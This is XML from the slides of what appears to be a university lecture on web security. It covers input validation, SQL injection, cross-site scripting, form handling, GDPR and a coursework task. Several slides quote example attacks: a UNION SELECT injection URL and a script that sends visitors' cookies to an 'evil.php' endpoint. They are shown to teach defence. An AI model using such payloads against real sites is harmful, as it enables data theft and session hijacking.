                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can target any modifiable data sent to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So validate ALL input data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>First validate that the input exists</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then make sure that it is safe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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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heckerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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checkerboard(across)">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03871" y="404664"/>
            <a:ext cx="6448449" cy="817017"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>SQL injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6021388"/>
            <a:ext cx="7772400" cy="504825"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We need to sanitise data input</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="2060848"/>
            <a:ext cx="7560840" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Involves sending data to the server which includes extra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> commands, e.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>http://myweb.com/index.php?category=1 union select * from users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Cross-site scripting (XSS) attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1772816"/>
            <a:ext cx="8424935" cy="4680372"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attackers inject client-side code into input areas in web pages or via query strings in URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Basic non-malicious example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>enter &lt;script&gt;alert('HELLO FRIENDS');&lt;/script&gt; in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Malicious code can be sent to other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We need to prevent entry of arbitrary script code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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3767138"/>
            <a:ext cx="4895850"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509" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7359650" y="6453188"/>
            <a:ext cx="180022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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: nuwarp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043608" y="404664"/>
            <a:ext cx="7776864" cy="864096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>XSS attacks – malicious example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1772816"/>
            <a:ext cx="8352927" cy="4536504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attacker inserts code like the following as posted input to, e.g., a message board</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = '../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>evil.php?cakemonster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=' +  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>                       escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What happens when another user views the message post?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The contents of that user’s cookie will be sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>evil.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6443663" y="6453188"/>
            <a:ext cx="266065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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: www.owasp.org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a:t>Forms and data visibility</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949325" y="1700808"/>
            <a:ext cx="7661275" cy="4536504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using HTTP GET means data is visible in URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>use for idempotent actions (where data isn’t changed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Use POST for actions which change data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Always sanitise data before using in a query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Use prepared statements in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>php</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6D60-D6C0-CC48-A0BE-320CA31CD86D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web security and the law</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911B137B-9B90-2A4A-A56E-A78E003006C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key legislation in the UK:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GDPR (General Data Protection Regulation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DPA 2018 (The data protection act)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The DPA enacts GDPR into UK law</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3662994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370D5-55B2-0D4A-82D4-C10432C6C0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GDPR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B2B5EC-5102-2641-AF22-55696B0A80F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Seven key principles:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Lawfulness, fairness and transparency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Purpose limitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Data minimisation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Accuracy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Storage limitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Integrity and confidentiality (security)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Accountability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1562339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46F72-E228-6948-8D8B-98E33D6463E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GDPR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76ED7E56-A2C7-B444-B777-60213454A3AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Under GDPR at least one of these must apply when personal data is processed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Consent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Contract</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Legal obligation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Vital interests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Public task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Legitimate interests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3272635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A2D0-04B2-D440-9347-D900944E8FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GDPR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E43B4E66-409B-BA44-B704-90F5616B6DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="1981200"/>
            <a:ext cx="8208913" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>The GDPR provides the following rights for individuals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>The right to be informed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>The right of access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>The right to rectification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>The right to erasure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>The right to restrict processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>The right to data portability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>The right to object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127851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29FC1-3C89-3A43-8F0C-4C0FCB1381D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why security?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C013B4CE-1287-A742-B3B1-883F74529F42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Security is an important dimension of all topics in computer science, and especially web technologies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web applications often store personal and sensitive data and are accessible all over the world, and so often a target for hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Poor programming and design practices can easily make personal and sensitive data easily accessible, or leave users vulnerable in other ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Many web technologies, including PHP, were not built in a security centric way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2498705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BEF9D-4042-9647-94D7-C698A597928C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security and the assignment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D42C34B8-4396-D047-9BCC-3C17105FA80C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1981200"/>
            <a:ext cx="8280919" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
              <a:t>Task 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> “… Add a sub-heading to your credits page called “Security considerations”. Under that heading, in no more than two paragraphs, discuss the security considerations related to the web site and what steps you recommend that they could take to minimise any potential security risks.  Within your discussion you should consider, for example, data protection and privacy, legal issues and any other relevant security matters. You should acknowledge (reference) any sources that you have read to help inform the discussion using the Harvard style of referencing.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2341169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115616" y="476672"/>
            <a:ext cx="6982544" cy="782662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
